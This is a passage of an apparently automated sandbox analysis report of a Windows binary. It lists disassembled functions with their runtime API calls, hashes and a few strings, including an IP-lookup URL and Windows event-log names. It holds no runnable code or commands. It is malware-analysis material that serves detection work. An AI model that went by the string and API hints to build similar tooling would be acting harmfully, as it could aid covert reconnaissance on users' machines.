                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 294e30e33237f614d553a8616d03b456f925f8fa26abcf6bbcb68f5e37fb1cb1
                                        • Instruction ID: 92c812b1f6c36c9b94c7750aa53125eb79debb5b977ffdd3c25aa2990fd01d06
                                        • Opcode Fuzzy Hash: 294e30e33237f614d553a8616d03b456f925f8fa26abcf6bbcb68f5e37fb1cb1
                                        • Instruction Fuzzy Hash: 57517D63E29B81A8EB00CF65D4912AD2321EB497A4F505332EE6CD7B99DF6CE1848350
                                        Function 00007FF670FC3710 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: https://api.ipify.org
                                        • API String ID: 1489393663-2202801394
                                        • Opcode ID: 6262807c10bc088014f41e382774cdef2928cc7cd859120c8615ceda734d3c7e
                                        • Instruction ID: bf71496fc0c924a46a094e5eff024ebc2038334c15512847ede0eb554005743c
                                        • Opcode Fuzzy Hash: 6262807c10bc088014f41e382774cdef2928cc7cd859120c8615ceda734d3c7e
                                        • Instruction Fuzzy Hash: B941A1A3B2DAC1A5EA109B12A5053AE6365BB49BD4F580336DFADCB7C5DF3CE0518310
                                        Function 00007FF670FC5210 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Application$Security
                                        • API String ID: 2075926362-3957089671
                                        • Opcode ID: 254d94e1410b596e8b4f3743d8d75c6d53527c0e069e7d98301bd8a707a24a1d
                                        • Instruction ID: 03945433eb650c6a705b450a886eaa33351080452c9918e87dc188d4dfd5d7b2
                                        • Opcode Fuzzy Hash: 254d94e1410b596e8b4f3743d8d75c6d53527c0e069e7d98301bd8a707a24a1d
                                        • Instruction Fuzzy Hash: BC31A323A1D7C1A5EA149B51A9012BA2295EB45FF4F680730DE7DCB7D1DF7CE0D18210
                                        Function 00007FF670FC21A0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF670FC21C0
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                        • ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF670FC2216
                                        • ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF670FC2232
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FC2242
                                        • ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF670FC2251
                                        • ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF670FC2265
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
                                        • String ID:
                                        • API String ID: 3292048638-0
                                        • Opcode ID: e91d51617bfb5f1c979a81019cbdcdfb600ed16b8d7ce9e410bafdc752ee1be9
                                        • Instruction ID: b4fe5b3c6fab03094e4863190821e71c3649c6d410c26668060718d7b88a3a9c
                                        • Opcode Fuzzy Hash: e91d51617bfb5f1c979a81019cbdcdfb600ed16b8d7ce9e410bafdc752ee1be9
                                        • Instruction Fuzzy Hash: 9C310E37A19B8196EB609F66E85426AB3A4FB48B80F144135CF8E83B61DF3CE095C350
                                        Function 00007FF670FC8E00 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 318COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: Security$System
                                        • API String ID: 432778473-2661570791
                                        • Opcode ID: 9ca77f19fb11e3cf4ba1f86fff28f7402b9ec14501f6bb769ed6b0f6a5b6db53
                                        • Instruction ID: 142bddaaa08b87a543244beccf06eff112ca90734816ee4d79d21013bb899404
                                        • Opcode Fuzzy Hash: 9ca77f19fb11e3cf4ba1f86fff28f7402b9ec14501f6bb769ed6b0f6a5b6db53
                                        • Instruction Fuzzy Hash: 9DC1CD33A2DBC696E7018B65E4453AE33A5EB55B88F088635DF8C87746EF3CA191C350
                                        Function 00007FF670FC8720 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 252COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$_invalid_parameter_noinfo_noreturn
                                        • String ID: System
                                        • API String ID: 2822070131-3470857405
                                        • Opcode ID: 0314efecf23b9183828dfd4f7d6faffbdde8dd2fccbdcc1d54c395153d8edd79
                                        • Instruction ID: 7288ea037f8b2ffad954a1cdcb0748d46aa295e8ca5e933d43715476c61e40cf
                                        • Opcode Fuzzy Hash: 0314efecf23b9183828dfd4f7d6faffbdde8dd2fccbdcc1d54c395153d8edd79
                                        • Instruction Fuzzy Hash: E4B1C42391CBC6A1EB119B24D4422BE6760FB95788F549632DF8C93B96DF3CE582C350
                                        Function 00007FF670FC2A40 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                        Download Yara Rule
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC2B12
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                          • Part of subcall function 00007FF670FC11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF670FC11CB
                                        • memmove.VCRUNTIME140 ref: 00007FF670FC2B33
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC2B4F
                                          • Part of subcall function 00007FF670FC1120: __std_exception_copy.VCRUNTIME140 ref: 00007FF670FC1164
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC2BB5
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC2BBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemmove
                                        • String ID:
                                        • API String ID: 144170543-0
                                        • Opcode ID: 7fc0a57f3f69f14adfe3361cf7d7eb95831778cba61eb4ba92089be02b8ff312
                                        • Instruction ID: af35c96a70fe2dfc7a2999846365ec7e90e17bb8ded32d610b10711fb3cff384
                                        • Opcode Fuzzy Hash: 7fc0a57f3f69f14adfe3361cf7d7eb95831778cba61eb4ba92089be02b8ff312
                                        • Instruction Fuzzy Hash: 40419123B19B8291EA549F25E9453692360EB84BA4F148332DE2C877D6DF3CD8D68310
                                        Function 00007FF670FC2670 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-3916222277
                                        • Opcode ID: 177c243d06eaa4426d10ac5b96c593ce6d3cf71fbaf6bea3286e178d050784a9
                                        • Instruction ID: bec261da1a63549a22052119c813eeb1e0612105e3df2dbc087c703588223b97
                                        • Opcode Fuzzy Hash: 177c243d06eaa4426d10ac5b96c593ce6d3cf71fbaf6bea3286e178d050784a9
                                        • Instruction Fuzzy Hash: 8C514B73A18B85A6EB558F2AD9952693360FB48B94F544632CF5DC3BA0CF3DE0A1C310
                                        Function 00007FF670FCF9F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: __current_exception__current_exception_contextterminate
                                        • String ID: csm
                                        • API String ID: 2542180945-1018135373
                                        • Opcode ID: 9a71d54b323909634587fecb3b0b832e45101661dec1fdc02d4fe101acb10c47
                                        • Instruction ID: 320f03ec5f42527054143d8041ab18251576a90f185f00af1700b082c8b36201
                                        • Opcode Fuzzy Hash: 9a71d54b323909634587fecb3b0b832e45101661dec1fdc02d4fe101acb10c47
                                        • Instruction Fuzzy Hash: A7F04437619B85CAD7549F21E8822AC3364F748B88B496230FE8D87B15CF3CD890D720
                                        Function 00007FF670FC5E40 Relevance: 6.4, APIs: 5, Instructions: 130COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmovememset
                                        • String ID:
                                        • API String ID: 1288253900-0
                                        • Opcode ID: a361461ebd74b817559f1ba7322bb17d22a5080eb4e1f2fdce319b824f189eee
                                        • Instruction ID: ee60e357a0f99d6d5471c72a02118e1fda00a2cd14dafa382347ab2aefa2c7f8
                                        • Opcode Fuzzy Hash: a361461ebd74b817559f1ba7322bb17d22a5080eb4e1f2fdce319b824f189eee
                                        • Instruction Fuzzy Hash: DA414423A3D6D1A2EB28CB2881423AE6791EB01B80F848235DB5DC3B86DF3DE555C310
                                        Function 00007FF670FC30A0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID:
                                        • API String ID: 2075926362-0
                                        • Opcode ID: 53e794fc6dfcec2b46ca8ea9a57cfb84a65b1bacf8cfac426bbf2e7376b1d71d
                                        • Instruction ID: 069d54569b30929f42b04dc04bd2f26edb11671ffb1775226fdb1eefcb093796
                                        • Opcode Fuzzy Hash: 53e794fc6dfcec2b46ca8ea9a57cfb84a65b1bacf8cfac426bbf2e7376b1d71d
                                        • Instruction Fuzzy Hash: 6F31C263F2DAC2A8FA159B55A5063BA1255AB05FE4F580331CE2DC7BC6DF3DE4818320
                                        Function 00007FF670FC35A0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3682
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC36C0
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC36CA
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC36FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        • Opcode ID: 05aab7d743464d29dd3f813d22ba04bb97828900f5c74b9fee27cd6eba36183f
                                        • Instruction ID: ce0e552a2359a319845ca59b3a8e84a47b4b1138a3ee3da9ff38de52752ce2ef
                                        • Opcode Fuzzy Hash: 05aab7d743464d29dd3f813d22ba04bb97828900f5c74b9fee27cd6eba36183f
                                        • Instruction Fuzzy Hash: D231D033B2D7C1B5EA109B16A5057AAA255AB04BD4F180335DE6DCBBD6DF7CE041A320
                                        Function 00007FF670FCC990 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(00000131,00000000,?,00007FF670FC577C,?,?,?,?,?,?,?,?,?,?,?,00000131), ref: 00007FF670FCC9FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        • Opcode ID: c35bdca75d66289cbbe8792ce3d9646c1a9eae02c5a1099fc4d5f8dfa5f79646
                                        • Instruction ID: f076a6964c146498b3208d4df39c4bb8cdd75c7389a73a6a8ca38001744e750e
                                        • Opcode Fuzzy Hash: c35bdca75d66289cbbe8792ce3d9646c1a9eae02c5a1099fc4d5f8dfa5f79646
                                        • Instruction Fuzzy Hash: 2D312323B1D7C5A9FA159F66A5453BA2144AF05BE4F280331CE2C87BD2DF3C94D283A0
                                        Function 00007FF670FCB6A0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        • Opcode ID: e8fe7e958e29a31c6a6ccf4bccc616f4523a748d99ed05b8f57287ff5b306960
                                        • Instruction ID: c84d0a76c4922c3edc171e4f44355bec031c212c4deef36308974a7f37a553a6
                                        • Opcode Fuzzy Hash: e8fe7e958e29a31c6a6ccf4bccc616f4523a748d99ed05b8f57287ff5b306960
                                        • Instruction Fuzzy Hash: D731B26BB2DAC1A5EE109B1195063AA6255AF84BD0F580731DE6DCBBD5DF3CE0418320
                                        Function 00007FF670FC34A0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 1247048853-0
                                        • Opcode ID: 6b4d8e943c827b092aac02f0c4dc6a22bc2bdbd620c48232d5eaa4421c51ee35
                                        • Instruction ID: bcdb8dd90446eda68124a2b5c3b2875aa434af3e0fd8101853b70d996693cd36
                                        • Opcode Fuzzy Hash: 6b4d8e943c827b092aac02f0c4dc6a22bc2bdbd620c48232d5eaa4421c51ee35
                                        • Instruction Fuzzy Hash: 6721F763A1E7D665FA259B51A40137E2254AB05BE4F180B31DE6CC7BC6DF3CA4928320
                                        Function 00007FF670FCA640 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 339COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF670FCCCF0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FCCE9A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,Security,System,?,?,?,00007FF670FCAFB7), ref: 00007FF670FCAA94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: Security$System
                                        • API String ID: 73155330-2661570791
                                        • Opcode ID: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction ID: 2c7f4c1b3a9abc46fe6db9f3986f18e6200a51ccd82b52cf30abb9b6bb73ee17
                                        • Opcode Fuzzy Hash: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction Fuzzy Hash: 1BE18123A29AC1A4EB14CB65D4422BE67A1FB44B8CF449636CF5D97789DF3CE490C350
                                        Function 00007FF670FCCCF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: System
                                        • API String ID: 118556049-3470857405
                                        • Opcode ID: 4fc0c7eaf7f74b3e870daa3c842a4730caff543050ed0bc9254fe8d7cb5bb188
                                        • Instruction ID: 50956003063484d3112576ad19d9b0c67fa9a24a10dac180f8713719755ff9ec
                                        • Opcode Fuzzy Hash: 4fc0c7eaf7f74b3e870daa3c842a4730caff543050ed0bc9254fe8d7cb5bb188
                                        • Instruction Fuzzy Hash: 8741D023A19BC595EE108F2995011BA6750EB49BA8F18A731CEAE837D5EF3CE4C1C250
                                        Function 00007FF670FC85B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC8661
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC8710
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
